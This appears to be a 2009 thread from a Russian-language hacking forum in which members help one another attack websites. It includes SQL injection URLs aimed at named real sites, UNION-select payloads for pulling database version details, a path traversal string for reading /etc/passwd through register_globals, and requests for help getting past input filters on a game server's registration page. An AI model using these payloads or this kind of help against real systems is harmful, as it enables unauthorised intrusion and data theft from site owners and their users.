Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. _Zeus_

    _Zeus_ New Member

    Joined:
    18 Feb 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Дык, таки не поддаеться. Веб Кнайт. :(
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    там же их 8.
     
    _________________________
  3. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    ордер бай говорит что их 8, но унион говорит что нет((((
    наверное фильтруеться унион. Можна подзапросами мучать но я в них неселен(
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    А все равно 4-ая ветка, брут только:

    Code:
    http://www.ajjp.org/campaigns/signStatement.php?cid=15+and+substring(version(),1,1)=4/*
    
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    [JavaScript], должно быть параметр передается в несколько запросов. Мне не удалось засечь вывод, поковыряй еще сам https://forum.antichat.ru/showpost.php?p=1047515&postcount=79

    Там версия 4.0 .. Подзапросы появились начиная с 4.1.0
     
  6. it's mу

    it's mу Banned

    Joined:
    12 Feb 2009
    Messages:
    47
    Likes Received:
    32
    Reputations:
    5
    :( я в печале

    допустим у нас есть такой код:

    Code:
    $pass = $_GET['pass'];
    $pass = preg_replace("/'/", "\", $pass);
    $pass = preg_replace("/\//", "\", $pass);
    // etc preg_perlace заменяет некоторые символы на слэш
    
    mysql_wuery("SELECT * FROM passwords where (pwd = '$pass' or pwd = '$pass' or pwd = '$passs')");
    Собственно, ковычка обрезается, т.е. получается:
    SELECT * FROM passwords where (pwd = '\' or pwd = '\' or pwd = '\')
     
    #5546 it's mу, 22 Feb 2009
    Last edited: 22 Feb 2009
  7. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    1. До перестановки системы у меня в закладках был хороший онлайн декодирощик, адрес вспомнить немогу... а он во всё подряд переводил... сожет кто подкинет линк. кто чем пользуется!.

    2. /index1.php?show=about&id0=-1+union+select+1,2,3 --

    вывод на 2 поля 1 и 2 .... пишу version() или @@version ошибка.. что делать?
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 F4R

    www.x3k.ru
    http://www.webfuture.ru/igo/convert.php


    /index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version()),0x71),0x71),3 --
     
  9. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2

    x2k.ru

    тормозной и неудобный а второй тока в sql и ораклу умеет... нао что то другое... или может есть какая то програмулька ?

    а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)

    неканает!
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    попробуй тогда

    unhex i hex
     
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    А что тебе ещё надо?

    @@version?
    Кинь ссылку, да и все..
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 R1dex
    уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...
     
    1 person likes this.
  13. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2

    да, огромное тебе спасибо!
     
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Code:
    Есть скрипт следующего содержания:
    
    <?php
    $base_url="";
    require_once("func.php");
    $l=db_connect();
    $id_page=28;
    echo_body($id_page);
    require($base_url."inc/top2.inc.php");
    //==
    ?>
    <?php
    //==
    require($base_url."inc/bottom6.inc.php");?>  
    
    на сервере register_globals = On и mysql_quotes_gpc = Off
    
    Могу ли я переопределить переменную $base_url ?
    
    Пробовал так:
    
    site.ru/script.php?base_url=../../../../../../../../../../../../etc/passwd%00
    
    Но не сработало...
    
    
     
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Как обычно умудрился внести путаницу даже в этот вопрос :)

    Если это один скрипт, то нет не сможешь. Если это 2 разных файла то во втором сможешь

    Тоесть тут
    PHP:
    <?php
    $base_url
    ="";
    require_once(
    "func.php");
    $l=db_connect();
    $id_page=28;
    echo_body($id_page);
    require(
    $base_url."inc/top2.inc.php");
    //==
    ?>
    Переменная определена
    а тут нет
    PHP:
    <?php
    //==
    require($base_url."inc/bottom6.inc.php");
    ?>
    Если всё это в одном файле, то нет. Я просто зная твои вопросы не удивлюсь , если это 2 разных файла. :)
    -------------------------------
    2 it's mу ты или перепиши код в вопросе, или на словах объясни, что там у тебя на что заменяется. Твой код вообще работать не будет, и логика SQL запроса тоже не вполне понятна
     
  16. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    В одном файле.Но разные скрипты.Какая разница,определена переменная или нет.если регистр глобалс есть,а значит я могу переопределить любую переменную.Разве не так ?)Во всех файлах такая же фигня =_=
     
  17. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Велемир :/ , определить можно только неопределенные переменные, в этом суть.

    В твоем случае

    $base_url="";

    Она определена уже (я про первый скрипт, во втором - нет). Но это я повторяю то что сказал jokester... Перечитай статьи о ргистер глобалс
     
    #5557 ElteRUS, 22 Feb 2009
    Last edited: 22 Feb 2009
  18. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    102
    Likes Received:
    28
    Reputations:
    10
    Как обойти фильтрацию? если даже скобки фильтруются(( плз ктото кто шарит в пхп иньекциях дайте асю) поделитись знаниями)
     
    1 person likes this.
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    S[N]EP без линка сейчас начнутся нелепые домыслы на 5 страниц
    И вобще по твоему вопросу не вполне понятно о какой инъекции идёт речь то-ли скуль, то-ли пхп

    PS И ещё момент, а зачем скобки? :)
     
  20. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    102
    Likes Received:
    28
    Reputations:
    10
    вот ссылка http://reg.la2titan.ru/index.php?act=fuck
    Мне кажется что это пхп Иньёкция)
    но там фильтруюца точки и другие символы.... Читал на ачате что это можно обойти через base64 но там нада скобки использовать для раскодировки тут они тоже запрещены вот я и незнаю что делать)
     
Thread Status:
Not open for further replies.